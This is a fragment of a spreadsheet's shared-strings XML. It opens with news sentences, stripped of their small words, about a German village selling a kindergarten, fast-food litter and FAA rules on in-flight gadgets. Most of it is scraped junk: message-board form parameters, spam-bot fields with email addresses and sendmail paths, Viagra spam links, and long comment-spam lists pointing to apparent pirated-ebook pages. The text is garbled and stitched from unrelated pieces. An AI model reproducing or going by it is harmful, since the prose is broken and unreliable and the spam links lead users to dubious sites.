    <t xml:space="preserve"> The building changed hands &amp;quot; appropriate &amp;quot; price </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; The local authorities satisfied , &amp;quot; emphasised Maier </t>
  </si>
  <si>
    <t xml:space="preserve"> EUR 100,000 added local budget </t>
  </si>
  <si>
    <t xml:space="preserve"> It yet clear new owner use former Kindergarten </t>
  </si>
  <si>
    <t xml:space="preserve"> The Mayor considers right decision Winterlingen handed responsibility building someone else winter , thus longer pay upkeep building , heating , tending garden clearing pavement </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; This expense offloaded , &amp;quot; Maier glad say </t>
  </si>
  <si>
    <t xml:space="preserve"> The throwaway society think The night long , music loud atmosphere good , point everyone go home </t>
  </si>
  <si>
    <t xml:space="preserve"> Except: In stomachs passenger back seats , hunger strikes </t>
  </si>
  <si>
    <t xml:space="preserve"> Of course , may odd cocktail glass bubbly ! So could natural casually pull next drive-through pick little treat ? I admit , I right comes picking fast food late night , early morning case may </t>
  </si>
  <si>
    <t xml:space="preserve"> A chips , coke , burger - straight home bed ! However , way home clear differences hungry clubbers become evident </t>
  </si>
  <si>
    <t xml:space="preserve"> What wrong people continually throw fast food bags car window ? ! At weekend particular , discarded paper bags found side road car parks </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Why ? &amp;quot; I ask </t>
  </si>
  <si>
    <t xml:space="preserve"> Are people stupid take bags home throw nearest rubbish bin ? After , waste paper spoil landscape </t>
  </si>
  <si>
    <t xml:space="preserve"> Bags also seen covering transport facilities crash barriers , thus causing accidents </t>
  </si>
  <si>
    <t xml:space="preserve"> However , so-called &amp;quot; throwaway society &amp;quot; think things </t>
  </si>
  <si>
    <t xml:space="preserve"> They probably even know term even means </t>
  </si>
  <si>
    <t xml:space="preserve"> If often evening , often several people car , know back seat look like partied night: clothes , bottles rubbish begin pile </t>
  </si>
  <si>
    <t xml:space="preserve"> A bags &amp;apos;t make much difference - contrast street no-one wants trample peoples &amp;apos; leftover food </t>
  </si>
  <si>
    <t xml:space="preserve"> I see day coming towns municipalities get fed clearing - fast food chains operate deposit scheme bags </t>
  </si>
  <si>
    <t xml:space="preserve"> FAA: Air passengers use gadgets planes (but make cell phone calls) Airline passengers able use electronic devices gate-to-gate read , work , play games , watch movies listen music - talk cellphones - much-anticipated new guidelines issued Thursday Federal Aviation Administration </t>
  </si>
  <si>
    <t xml:space="preserve"> But passengers &amp;apos;t expect changes happen immediately </t>
  </si>
  <si>
    <t xml:space="preserve"> How fast change implemented vary airline , FAA Administrator Michael Huerta said news conference </t>
  </si>
  <si>
    <t xml:space="preserve"> Airlines show FAA airplanes meet new guidelines &amp;apos;ve updating flight crew training manuals rules stowing devices reflect new guidelines </t>
  </si>
  <si>
    <t xml:space="preserve"> The FAA said already received plans airlines expand use portable electronic devices planes </t>
  </si>
  <si>
    <t xml:space="preserve"> Delta JetBlue among airliners already submitted plans </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Depending condition plan , could approve expanded use electronic devices soon , &amp;quot; FAA said statement </t>
  </si>
  <si>
    <t xml:space="preserve"> Currently , passengers required turn smartphones , tablets devices plane &amp;apos;s door closes </t>
  </si>
  <si>
    <t xml:space="preserve"> They &amp;apos;re supposed restart planes reach 10,000 feet captain gives go-ahead </t>
  </si>
  <si>
    <t xml:space="preserve"> Passengers supposed turn devices plane descends land restart plane ground </t>
  </si>
  <si>
    <t xml:space="preserve"> Under new guidelines , airlines whose planes properly protected electronic interference may allow passengers use devices takeoffs , landings taxiing , FAA said </t>
  </si>
  <si>
    <t xml:space="preserve"> Most new airliners planes modified passengers use Wifi higher altitudes expected meet criteria </t>
  </si>
  <si>
    <t xml:space="preserve"> Laura Glading , president Association Professional Flight Attendants , welcomed changes </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Once new policy safely implemented - &amp;apos;re going work closely carrier - win-win , &amp;quot; Glading said statement </t>
  </si>
  <si>
    <t xml:space="preserve"> We &amp;apos;re frankly tired feeling like &amp;apos; hall monitors &amp;apos; comes issue </t>
  </si>
  <si>
    <t xml:space="preserve"> But connecting Internet surf , exchange emails , text download data still prohibited 10,000 feet , agency said </t>
  </si>
  <si>
    <t xml:space="preserve"> Passengers told switch smartphones , tablets devices airplane mode </t>
  </si>
  <si>
    <t xml:space="preserve"> So , still Words With Friends , online Scrabble-type game actor Alec Baldwin playing smartphone 2011 famously booted American Airlines jet refusing turn device plane parked gate </t>
  </si>
  <si>
    <t xml:space="preserve"> And heavier devices laptops continue stowed concern might injure someone go flying around cabin </t>
  </si>
  <si>
    <t xml:space="preserve"> In-flight cellphone calls also continue prohibited </t>
  </si>
  <si>
    <t xml:space="preserve"> Regulatory authority phone calls belongs Federal Communications Commission , FAA </t>
  </si>
  <si>
    <t xml:space="preserve"> FAA may lift ban electronic devices takeoff landing Last month , National Transportation Safety Board Mark Rosenker , CBS News national transportation safety expert , said cell phones still considered risk </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; Cell phones , really issue , potentially could create interference navigational devices , know , according FCC , could interfere cell phone towers &amp;apos;re air , &amp;quot; Rosenker said </t>
  </si>
  <si>
    <t xml:space="preserve"> An industry advisory committee created FAA examine issue recommended last month government permit greater use personal electronic devices </t>
  </si>
  <si>
    <t xml:space="preserve"> Pressure building FAA recent years ease restrictions use </t>
  </si>
  <si>
    <t xml:space="preserve"> Critics Sen</t>
  </si>
  <si>
    <t xml:space="preserve"> Claire McCaskill , D-Mo </t>
  </si>
  <si>
    <t xml:space="preserve"> , contend valid safety reason prohibitions </t>
  </si>
  <si>
    <t xml:space="preserve"> The restrictions also become increasingly difficult enforce use devices become ubiquitous </t>
  </si>
  <si>
    <t xml:space="preserve"> The FAA began restricting passengers &amp;apos; use electronic devices 1966 response reports interference navigation communications equipment passengers began carrying FM radios , high-tech gadgets day </t>
  </si>
  <si>
    <t xml:space="preserve"> New airliners far reliant electrical systems previous generations aircraft , also designed approved FAA resistant electronic interference </t>
  </si>
  <si>
    <t xml:space="preserve"> Airlines offering Wi-Fi use cruising altitudes passengers several years </t>
  </si>
  <si>
    <t xml:space="preserve"> Planes modified Wi-Fi systems also resistant interference </t>
  </si>
  <si>
    <t xml:space="preserve"> The vast majority airliners qualify greater electronic device use new guidelines , Huerta said </t>
  </si>
  <si>
    <t xml:space="preserve"> Today &amp;apos;s electronic devices generally emit much lower power radio transmissions previous generations devices </t>
  </si>
  <si>
    <t xml:space="preserve"> E-readers , example , emit minimal transmissions turning page </t>
  </si>
  <si>
    <t xml:space="preserve"> But transmissions stronger devices downloading sending data </t>
  </si>
  <si>
    <t xml:space="preserve"> Among pressing relaxation restrictions passengers &amp;apos; use devices Amazon</t>
  </si>
  <si>
    <t xml:space="preserve"> In 2011 , company officials loaded airliner full Kindle e-readers flew around test problems found none </t>
  </si>
  <si>
    <t xml:space="preserve"> FAA advisory committee members expressed mixed feelings whether use devices presents risk </t>
  </si>
  <si>
    <t xml:space="preserve"> Douglas Kidd National Association Airline Passengers said believes interference devices genuine even risk minimal </t>
  </si>
  <si>
    <t xml:space="preserve"> Other committee members said anecdotal reports pilots support devices interfere aircraft systems , reports old </t>
  </si>
  <si>
    <t xml:space="preserve"> However , committee recommended FAA allow pilots order passengers shut devices instrument landings low visibility </t>
  </si>
  <si>
    <t xml:space="preserve"> A travel industry group welcomed changes , calling common-sense accommodations traveling public bristling technology </t>
  </si>
  <si>
    <t xml:space="preserve"> &amp;quot; We &amp;apos;re pleased FAA recognizes enjoyable passenger experience incompatible safety security , &amp;quot; said Roger Dow , CEO U</t>
  </si>
  <si>
    <t xml:space="preserve"> Travel Association </t>
  </si>
  <si>
    <t xml:space="preserve"> modify 9 28845 28845 apply2 Fun 2453 1 bbs314 129-945</t>
  </si>
  <si>
    <t>cgi down_file http://coolseo</t>
  </si>
  <si>
    <t>co</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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> 난 멋있다</t>
  </si>
  <si>
    <t xml:space="preserve"> 난 훌륭하다</t>
  </si>
  <si>
    <t xml:space="preserve"> 69 47164 F6 reply F6 1568 0 csdf1123mVwbHk =  9 134 e_qna eng modify 38 22747 22747 3945 556 V gallery2 view 366 3 F1 read F1 8628 80 sub0204 photo OPTOMA 218 30 02_01 1091 wr_datetime asc 2 sub0203 photo e_qna eng 8 18489 bbs338 12 view 132</t>
  </si>
  <si>
    <t>cgi yes awesomescott111@hanmail</t>
  </si>
  <si>
    <t>net /usr/lib/sendmail http://1sa23l</t>
  </si>
  <si>
    <t>net 홍길동 yoda-master@hanmail</t>
  </si>
  <si>
    <t>net /usr/lib/sendmail bbs338 12 view 120</t>
  </si>
  <si>
    <t>cgi yes sub0202 photo 2 1 yetglezip 71 75 e_qna view eng 25 47817 e_qna eng delete 41 24242 bbs314 129-945</t>
  </si>
  <si>
    <t>cgi down_file http://hohohohoohoho</t>
  </si>
  <si>
    <t>com/post/140267892711/management-consulting-via-how-to-get-more-value study 95 6 wr_datetime desc bbs338 12 view 122</t>
  </si>
  <si>
    <t>cgi 60 9bedb57073 heartbeat nav-menus false yetglezip 41 49 PRODUCT393 PRODUCT393 bbs1 1 view 115</t>
  </si>
  <si>
    <t>cgi 393 F4 read F4 634 PDS 1771 1 yetglezip 3980 wr_hit desc 497 1490110 bbs4 for_print 9</t>
  </si>
  <si>
    <t>cgi maket 238 %BB%E7%C0%E5%B4%DC -----------------------------7e116d19044c 2 [url = http://ciassssssional</t>
  </si>
  <si>
    <t>us</t>
  </si>
  <si>
    <t>com/]Buy Ciddds[/url] [url = http://vsdfasdfasdferic</t>
  </si>
  <si>
    <t>org/]VIAGRA TABS[/url] http://RockVideoGames</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</si>
  <si>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</si>
  <si>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/flash/agency/buchun01</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</si>
  <si>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</si>
  <si>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000 1</t>
  </si>
  <si>
    <t>004 10 100 100) 100*50 10031 10054 10093 101 10134board 10179 102 10229 10250 10293 10348 1038644987 105</t>
  </si>
  <si>
    <t>cgi 1051 1054 106 107 1071 1079 108 108</t>
  </si>
  <si>
    <t>cgi 1081743475 1085 109-1</t>
  </si>
  <si>
    <t>cgi 109090 1097 11 11</t>
  </si>
  <si>
    <t>cgi 2&amp; 20 20003 2017 201704/00001491382788757</t>
  </si>
  <si>
    <t>zip 201704/00001491528420366</t>
  </si>
  <si>
    <t>zip 201704/00001491528883971</t>
  </si>
  <si>
    <t>pdf 201704/00001491529916387</t>
  </si>
  <si>
    <t>pdf 201704/00001491529916625</t>
  </si>
  <si>
    <t>pdf 201704/00001491530124766</t>
  </si>
  <si>
    <t>zip 201704/00001491530253354</t>
  </si>
  <si>
    <t>pdf 201704/00001491530253903</t>
  </si>
  <si>
    <t>pdf 201704/00001491530747318</t>
  </si>
  <si>
    <t>pdf 201704/00001491531111591</t>
  </si>
  <si>
    <t>pdf 201704/00001491531111628</t>
  </si>
  <si>
    <t>pdf 201704/00001491531280013</t>
  </si>
  <si>
    <t>pdf 201704/00001491531338012</t>
  </si>
  <si>
    <t>pdf 201704/00001491531745287</t>
  </si>
  <si>
    <t>zip 201704/00001491531967789</t>
  </si>
  <si>
    <t>pdf 20170407112157Xyhcho 202 2020 203 204 20438 20648 20721304 214" alt = "time options" title = "time options s</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</si>
  <si>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</si>
  <si>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0" encoding = "utf-8" ?&gt;   &lt;_filter&gt;  &lt;![CDATA[insert]]&gt;  &lt;/_filter&gt;   &lt;_filter&gt;  &lt;![CDATA[signup]]&gt;  &lt;/_filter&gt;   &lt;_filter&gt;  &lt;![CDATA[widget_login]]&gt;  &lt;/_filter&gt;   &lt;a href = "http://caritaskinshasa</t>
  </si>
  <si>
    <t>org/?option = com_k2  &lt;a href = "http://corfopym</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</si>
  <si>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</si>
  <si>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picsearch</t>
  </si>
  <si>
    <t>com/is?-WZx-uhyLezKNiYLvAbKL3W4oh5F749nr2KUmFFjZOU  &lt;email_address&gt;  &lt;![CDATA[elwoodbuckley@freenet</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</si>
  <si>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트리거 L-840 450 트리거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 comment1, http://www</t>
  </si>
  <si>
    <t>autorepairnewportrichey</t>
  </si>
  <si>
    <t>com/russian-history/pdf-14307-160-fly_away_jill</t>
  </si>
  <si>
    <t>html Fly Away, Jill,  8-OOO, http://www</t>
  </si>
  <si>
    <t>millymillz</t>
  </si>
  <si>
    <t>com/fantasy/pdf-14473-275-beige_bible_book_cover</t>
  </si>
  <si>
    <t>html Beige Bible / Book Cover,  &gt; :-(((, http://www</t>
  </si>
  <si>
    <t>com/fantasy/pdf-14457-326-hawaiian_family_legends</t>
  </si>
  <si>
    <t>html Hawaiian Family Legends,   = -DD, http://www</t>
  </si>
  <si>
    <t>ifreakinglovefishing</t>
  </si>
  <si>
    <t>com/belgian/pdf-14256-211-my_big_fun_time_activity_book</t>
  </si>
  <si>
    <t>html My Big Fun Time Activity Book,  8], http://www</t>
  </si>
  <si>
    <t>netdomainproperties</t>
  </si>
  <si>
    <t>com/soccer/pdf-14276-394-rural_radicalism_in_unit_pb</t>
  </si>
  <si>
    <t>html Rural Radicalism Unit Pb,  5732, http://www</t>
  </si>
  <si>
    <t>thejustincredible</t>
  </si>
  <si>
    <t>com/queer/pdf-13919-477-vertebrates_of_the_united_states</t>
  </si>
  <si>
    <t>html Vertebrates United States,  0 comment1, http://www</t>
  </si>
  <si>
    <t>com/racing/pdf-14193-397-james_herriot_s_yorkshire_mermaid_books_</t>
  </si>
  <si>
    <t>html James Herriot's Yorkshire (Mermaid Books),   = -), http://www</t>
  </si>
  <si>
    <t>com/mountaineering/pdf-14382-248-dassault_mirage_f1_minigraph_</t>
  </si>
  <si>
    <t>html Dassault Mirage F1 (Minigraph),  36832, http://www</t>
  </si>
  <si>
    <t>com/lesbian/pdf-14101-50-the_thoughts_of_a_heart</t>
  </si>
  <si>
    <t>html The Thoughts Heart,  68239, http://www</t>
  </si>
  <si>
    <t>warintheheavens</t>
  </si>
  <si>
    <t>com/russian-literature/pdf-14428-66-silenced</t>
  </si>
  <si>
    <t>html Silenced,  799, http://www</t>
  </si>
  <si>
    <t>psychedesigns</t>
  </si>
  <si>
    <t>com/history-of-science/pdf-14498-442-great_escapes_inspirational_homes_in_stunning_locations_escape_</t>
  </si>
  <si>
    <t>html Great Escapes: Inspirational Homes Stunning Locations (Escape),  690, http://www</t>
  </si>
  <si>
    <t>warintheheavens comment1, http://www</t>
  </si>
  <si>
    <t>com/fat-acceptance/pdf-14175-447-origins_of_modern_english_society_1780_1880_stud_in_soc_hist_</t>
  </si>
  <si>
    <t>html Origins Modern English Society, 1780-1880 (Stud</t>
  </si>
  <si>
    <t xml:space="preserve"> Soc</t>
  </si>
  <si>
    <t xml:space="preserve"> Hist</t>
  </si>
  <si>
    <t>),  959, http://www</t>
  </si>
  <si>
    <t>nusaceninganresort</t>
  </si>
  <si>
    <t>com/activism/pdf-14447-258-grandmaster</t>
  </si>
  <si>
    <t>html Grandmaster,  603153, http://www</t>
  </si>
  <si>
    <t>nicholasfrance</t>
  </si>
  <si>
    <t>com/urban-studies/pdf-14223-111-reflections_on_lent</t>
  </si>
  <si>
    <t>html Reflections Lent,  pzcwvv, http://www</t>
  </si>
  <si>
    <t>com/fantasy/pdf-14281-436-pitter_patter_avalon_romance_</t>
  </si>
  <si>
    <t>html Pitter Patter (Avalon Romance),  18712, http://www</t>
  </si>
  <si>
    <t>com/humanities/pdf-14225-114-goldilocks_and_the_three_bears_first_stories_</t>
  </si>
  <si>
    <t>html Goldilocks Three Bears (First stories),  &gt; :], http://www</t>
  </si>
  <si>
    <t>com/mountai comment1, http://www</t>
  </si>
  <si>
    <t>com/historical-fiction/pdf-14312-117-seeing_the_invisible_pb_champions_of_the_faith_</t>
  </si>
  <si>
    <t>html SEEING THE INVISIBLE PB (Champions faith),  %PP, http://www</t>
  </si>
  <si>
    <t>com/eastern-philosophy/pdf-14057-402-introduction_to_school_guidance_counseling</t>
  </si>
  <si>
    <t>html Introduction school guidance counseling,  8(, http://www</t>
  </si>
  <si>
    <t>com/m-m-f/pdf-14027-396-the_green_brain</t>
  </si>
  <si>
    <t>html The Green Brain,   = (((, http://www</t>
  </si>
  <si>
    <t>com/musician-erotica/pdf-14195-171-little_ship_junior_gateway_s_</t>
  </si>
  <si>
    <t>html Little Ship (Junior Gateway S</t>
  </si>
  <si>
    <t>),   = O, http://www</t>
  </si>
  <si>
    <t>com/witchcraft/pdf-14107-386-the_talent_show_from_the_black_lagoon</t>
  </si>
  <si>
    <t>html The Talent Show Black Lagoon,  %]]], ht comment1, http://www</t>
  </si>
  <si>
    <t>com/m-m-f/pdf-14215-437-the_sales_advantage_how_to_get_it_keep_it_and_sell_more_than_ever</t>
  </si>
  <si>
    <t>html The Sales Advantage: How Get It, Keep It, Sell More Than Ever,  wvvdzf, http://www</t>
  </si>
  <si>
    <t>com/words/pdf-14165-268-the_plague_and_i</t>
  </si>
  <si>
    <t>html The Plague I,  cxeu, http://www</t>
  </si>
  <si>
    <t>michelleandnaf</t>
  </si>
  <si>
    <t>com/anthologies/pdf-14455-21-the_good_life_of_helen_nearing</t>
  </si>
  <si>
    <t>html The Good Life Helen Nearing,   = -(((, http://www</t>
  </si>
  <si>
    <t>com/roman/pdf-14475-394-alabama_1850_agricultural_and_manufacturing_census_for_dale_dallas_dekalb_fayette_franklin_greene_hancock_and_henry_counties</t>
  </si>
  <si>
    <t>html Alabama 1850 Agricultural Manufacturing Census Dale, Dallas, Dekalb, Fayette, Franklin, Greene, Hancock, Henr comment1, http://www</t>
  </si>
  <si>
    <t>webcaixa</t>
  </si>
  <si>
    <t>com/criticism/pdf-14107-205-the_giving_bear</t>
  </si>
  <si>
    <t>html The Giving Bear,  tbbwy, http://www</t>
  </si>
  <si>
    <t>bestoffertoday</t>
  </si>
  <si>
    <t>net/plays/pdf-14244-19-directions_readabout_</t>
  </si>
  <si>
    <t>html Directions (Readabout),  &gt; :-]], http://www</t>
  </si>
  <si>
    <t>parentsintech</t>
  </si>
  <si>
    <t>com/babylon-5/pdf-14274-382-_trauersinfonie_funeral_music_on_themes_from_euryanthe_by_c_m_von_weber_revised_for_concert_band_score_parts_</t>
  </si>
  <si>
    <t>html "Trauersinfonie - Funeral Music themes ""Euryanthe"" C</t>
  </si>
  <si>
    <t>M</t>
  </si>
  <si>
    <t>von Weber</t>
  </si>
  <si>
    <t xml:space="preserve"> Revised Concert Band (score &amp; parts)",  8-(((, http://www</t>
  </si>
  <si>
    <t>organikjoos</t>
  </si>
  <si>
    <t>com/wine/pdf-13965-110-the_tunnellers</t>
  </si>
  <si>
    <t>html The Tunnellers,  rbrhfj, http://www</t>
  </si>
  <si>
    <t>lissycakes</t>
  </si>
  <si>
    <t>com/moscow/pdf-13960-72-the_reader_s_choice_grade_6_california</t>
  </si>
  <si>
    <t>html The Reader's Choice, Grade 6, Cali comment2, http://www</t>
  </si>
  <si>
    <t>com/wine/pdf-14281-439-miss_dempsey_s_school_for_gunslingers_avalon_western_</t>
  </si>
  <si>
    <t>html Miss Dempsey's School For Gunslingers (Avalon Western),  %-[[[, http://www</t>
  </si>
  <si>
    <t>thelesserevil</t>
  </si>
  <si>
    <t>org/drama/pdf-13971-36-intimate_behaviour</t>
  </si>
  <si>
    <t>html Intimate Behaviour,  8-OO, http://www</t>
  </si>
  <si>
    <t>com/canon/pdf-14255-411-brake_systems_s1_how_automotive_brakes_work</t>
  </si>
  <si>
    <t>html Brake Systems S1 How Automotive Brakes Work,  sjl, http://www</t>
  </si>
  <si>
    <t>com/indonesian-literature/pdf-14112-7-_sm_cd_access_2002_basico</t>
  </si>
  <si>
    <t>html *SM CD Access 2002 Basico,  xqb, http://www</t>
  </si>
  <si>
    <t>nataliagallo</t>
  </si>
  <si>
    <t>com/western/pdf-14144-204-evans_above</t>
  </si>
  <si>
    <t>html Evans Above,  xio, http://www</t>
  </si>
  <si>
    <t>npforms</t>
  </si>
  <si>
    <t>com/ecology/pdf-14101-204-birds_of_prey_hamlyn_all_colour_paperbacks_natura comment2, http://www</t>
  </si>
  <si>
    <t>com/babylon-5/pdf-14404-88-sideways_look_at_time</t>
  </si>
  <si>
    <t>html Sideways Look At Time,  xll, http://www</t>
  </si>
  <si>
    <t>com/social-science/pdf-13969-426-the_case_of_the_general_s_thumb</t>
  </si>
  <si>
    <t>html The Case Of The General's Thumb,  :(, http://www</t>
  </si>
  <si>
    <t>com/pulp/pdf-14238-450-the_troubles_struggle_for_irish_freedom_1912_22</t>
  </si>
  <si>
    <t>html The Troubles: Struggle Irish Freedom, 1912-22,  1783, http://www</t>
  </si>
  <si>
    <t>digitalincome</t>
  </si>
  <si>
    <t>biz/mills-and-boon/pdf-14302-418-the_intimacy_factor</t>
  </si>
  <si>
    <t>html The Intimacy Factor,  &gt; :-D, http://www</t>
  </si>
  <si>
    <t>com/surreal/pdf-14119-441-taming_the_atom_the_emergence_of_the_visible_microworld</t>
  </si>
  <si>
    <t>html Taming Atom: The Emergence Visible Microworld,  wof, http://www</t>
  </si>
  <si>
    <t>net/m-m-m comment3, http://www</t>
  </si>
  <si>
    <t>net/how-to/pdf-14286-145-repairing_my_world_the_responsibilities_of_a_jewish_adult_leader_s_guide_</t>
  </si>
  <si>
    <t>html Repairing My World: The Responsibilities Jewish Adult (Leader's Guide),  %-]]], http://www</t>
  </si>
  <si>
    <t>com/criticism/pdf-13909-92-turik_shezhiresi</t>
  </si>
  <si>
    <t>html Turik Shezhiresi,  :-], http://www</t>
  </si>
  <si>
    <t>com/adaptations/pdf-14201-403-in_search_of_serenity</t>
  </si>
  <si>
    <t>html In Search Serenity,  18108, http://www</t>
  </si>
  <si>
    <t>1800stripclub</t>
  </si>
  <si>
    <t>com/christian-contemporary-fiction/pdf-14069-432-how_to_speak_southern</t>
  </si>
  <si>
    <t>html How Speak Southern,  830, http://www</t>
  </si>
  <si>
    <t>com/western/pdf-13916-55-the_quiet_crisis</t>
  </si>
  <si>
    <t>html The Quiet Crisis,  6476, http://www</t>
  </si>
  <si>
    <t>com/surreal/pdf-14119-441-taming_the_atom_the_eme comment3, http://www</t>
  </si>
  <si>
    <t>ceh-ebooks-free-download</t>
  </si>
  <si>
    <t>kobasho</t>
  </si>
  <si>
    <t>net/pdf-9756-330-chartres_schopfungsbau_und_ideenwelt_im_herzen_europas</t>
  </si>
  <si>
    <t>html chartres schopfungsbau und ideenwelt im herzen europas pdf,  pgwas, http://www</t>
  </si>
  <si>
    <t>download-it-ebooks-all-times-are-utc</t>
  </si>
  <si>
    <t>net/decitre-3-1234-l_atlas_de_la_distribution</t>
  </si>
  <si>
    <t>html l'atlas de la distribution pdf,  ahx, http://www</t>
  </si>
  <si>
    <t>chm-ebooks-download-free</t>
  </si>
  <si>
    <t>bgtlawyers</t>
  </si>
  <si>
    <t>com/decitre-28-3856-game_art_le_graphisme_des_jeux_vid%c3%a9o</t>
  </si>
  <si>
    <t>html game art - le graphisme des jeux vidéo pdf,  859, http://www</t>
  </si>
  <si>
    <t>comedy</t>
  </si>
  <si>
    <t>karatfarm</t>
  </si>
  <si>
    <t>com/pdf-515-58-words_of_fire</t>
  </si>
  <si>
    <t>html words fire pdf,  ebger, http://www</t>
  </si>
  <si>
    <t>ebooks-free-mystery-download</t>
  </si>
  <si>
    <t>net/pdf-493-232-sojourner_truth_ain_t_i_a_woman</t>
  </si>
  <si>
    <t>html sojourner truth ain't woman pdf,  crp, h comment3, http://www</t>
  </si>
  <si>
    <t>biz/yaoi/pdf-14243-206-this_is_my_night_me_and_my_world_</t>
  </si>
  <si>
    <t>html This My Night (Me My World),  :-), http://www</t>
  </si>
  <si>
    <t>com/mysticism/pdf-14334-219-japan_cultural_atlas_of_the_world_</t>
  </si>
  <si>
    <t>html Japan (Cultural atlas world),  8[[[, http://www</t>
  </si>
  <si>
    <t>com/cities/pdf-14383-192-eglin_long_horn_of_nightshade_county_a_teachers_guide_a_story_about_tobacco_use_choosing_to_be_tobacco_free</t>
  </si>
  <si>
    <t>html Eglin Long-Horn Nightshade County Teachers Guide: A Story Tobacco Use &amp; Choosing Be Tobacco-Free,  zodqbw, http://www</t>
  </si>
  <si>
    <t>biz/library-science/pdf-13910-164-ekonomicheskie_reformy_v_uzbekistane_v_deistvii</t>
  </si>
  <si>
    <t>html Ekonomicheskie Reformy V Uzbekistane--V Deistvii,  nwid, http://www</t>
  </si>
  <si>
    <t>parent comment3, http://www</t>
  </si>
  <si>
    <t>com/racing/pdf-13925-458-hunter_killer</t>
  </si>
  <si>
    <t>html Hunter Killer,  dsxq, http://www</t>
  </si>
  <si>
    <t>com/young-adult/pdf-14092-102-empire_of_the_sun</t>
  </si>
  <si>
    <t>html Empire Of The Sun,  dekvt, http://www</t>
  </si>
  <si>
    <t>com/visual-art/pdf-14043-250-concise_history_of_western_architecture_world_of_art_</t>
  </si>
  <si>
    <t>html Concise History Western Architecture (World Art),  wzz, http://www</t>
  </si>
  <si>
    <t>com/visual-art/pdf-14242-86-bed_and_breakfast_in_france_2002_aa_lifestyle_guides_</t>
  </si>
  <si>
    <t>html Bed Breakfast France 2002 (AA Lifestyle Guides),  :[[[, http://www</t>
  </si>
  <si>
    <t>com/soccer/pdf-14280-430-peder_victorious_a_tale_of_the_pioneers_twenty_years_later_a_bison_book_</t>
  </si>
  <si>
    <t>html Peder Victorious: A Tale Pioneers Twe comment3, http://www</t>
  </si>
  <si>
    <t>com/beading/pdf-14480-214-light_of_christ_addresses_given_at_the_house_of_retreat_pleshey_in_may_1932</t>
  </si>
  <si>
    <t>html Light Christ: Addresses Given House Retreat Pleshey, May, 1932,  keceff, http://www</t>
  </si>
  <si>
    <t>com/young-adult-contemporary/pdf-14441-335-wells_s_principles_and_applications_of_chemistry_for_the_use_of_academies_high_schools_and_colleges_introducing_the_latest_results_of_scientific_forty_illustrations_by_david_a_wells_</t>
  </si>
  <si>
    <t xml:space="preserve">html Wells's Principles Applications Chemistry\; For Use Academies, High Schools, Colleges: Introducing Latest Results Scientific </t>
  </si>
  <si>
    <t xml:space="preserve"> Forty Illustrations</t>
  </si>
  <si>
    <t xml:space="preserve"> David A</t>
  </si>
  <si>
    <t xml:space="preserve"> Wells, </t>
  </si>
  <si>
    <t>,  &gt; :-), http://www</t>
  </si>
  <si>
    <t>com/social-science/pdf-14102-107-great_houses_ comment3, http://www</t>
  </si>
  <si>
    <t>com/criticism/pdf-14055-109-m_series_united_states_deluxe_laminated_50x32_m_series_u_s_a_wall_maps_</t>
  </si>
  <si>
    <t>html M Series United States Deluxe Laminated 50x32 (M Series U</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t xml:space="preserve"> Wall Maps),  7424, http://www</t>
  </si>
  <si>
    <t>org/fat/pdf-14108-126-lionel_in_the_summer_lionel_puffin_</t>
  </si>
  <si>
    <t>html Lionel Summer (Lionel (Puffin)),  :-D, http://www</t>
  </si>
  <si>
    <t>com/wonder-woman/pdf-14166-367-gardens_of_the_night_a_trilogy</t>
  </si>
  <si>
    <t>html Gardens Night: A Trilogy,  oyb, http://www</t>
  </si>
  <si>
    <t>com/young-adult-contemporary/pdf-13983-383-the_infernal_desire_machines_of_doctor_hoffman_king_penguin_</t>
  </si>
  <si>
    <t>html The Infernal Desire Machines Doctor Hoffman (King Penguin),  %(((, http://www</t>
  </si>
  <si>
    <t>com/sewing/pdf-14006-136-thomas_comes comment4, http://www</t>
  </si>
  <si>
    <t>biz/library-science/pdf-14312-388-form_in_music</t>
  </si>
  <si>
    <t>html Form Music,  5659, http://www</t>
  </si>
  <si>
    <t>com/foodie/pdf-14461-288-the_adventures_of_sherlock_holmes</t>
  </si>
  <si>
    <t>html The Adventures Sherlock Holmes,  01101, http://www</t>
  </si>
  <si>
    <t>com/games/pdf-14166-177-living_by_the_word_selected_writings_1973_87</t>
  </si>
  <si>
    <t>html Living Word: Selected Writings, 1973-87,   = ))), http://www</t>
  </si>
  <si>
    <t>com/sewing/pdf-14002-116-battlestar_galactica</t>
  </si>
  <si>
    <t>html Battlestar Galactica,  kfab, http://www</t>
  </si>
  <si>
    <t>com/adaptations/pdf-13974-435-diatomic_interaction_potential_theory_applications_v_2_physical_chemistry_</t>
  </si>
  <si>
    <t>html Diatomic Interaction Potential Theory: Applications v</t>
  </si>
  <si>
    <t xml:space="preserve"> 2 (Physical Chemistry),  406882, http://www</t>
  </si>
  <si>
    <t>webcai comment5%2C+http%3A%2F%2Fwww</t>
  </si>
  <si>
    <t>com%2Fbeading%2Fpdf-14211-163-comprehension_skills_level_c_set</t>
  </si>
  <si>
    <t>html+Comprehension+Skills+Level+C+Set%2C++798199%2C+http%3A%2F%2Fwww</t>
  </si>
  <si>
    <t>com%2Fcanon%2Fpdf-13990-289-journal_of_a_thief</t>
  </si>
  <si>
    <t>html+Journal+of+a+Thief%2C++mcbxt%2C+http%3A%2F%2Fwww</t>
  </si>
  <si>
    <t>com%2Fcanon%2Fpdf-14003-108-_a_team_operation_desert_sun_the_untold_story_a_target_book_</t>
  </si>
  <si>
    <t>html+%22%22%22A%22%22+Team-Operation+Desert+Sun%3A+The+Untold+Story+(A+Target+book)%22%2C++jplmot%2C+http%3A%2F%2Fwww</t>
  </si>
  <si>
    <t>com%2Fyoung-adult-contemporary%2Fpdf-14395-490-leaving_home_guide</t>
  </si>
  <si>
    <t>html+Leaving+Home+Guide%2C++631%2C+http%3A%2F%2Fwww</t>
  </si>
  <si>
    <t>com%2Ftrivia%2Fpdf-13957-332-becoming_whole_again_help_for_women_survivors_of_childhood_sexual_abuse</t>
  </si>
  <si>
    <t>html+Becoming+Whole+Again%3A+Help+for+Women+Survivors+of+Childhood+Sexual+Abuse% comment5, http://www</t>
  </si>
  <si>
    <t>com/knitting/pdf-14433-478-the_life_and_adventures_of_james_p_beckwourth_mountaineer_scout_and_pioneer_and_chief_of_the_crow_nation_of_indians</t>
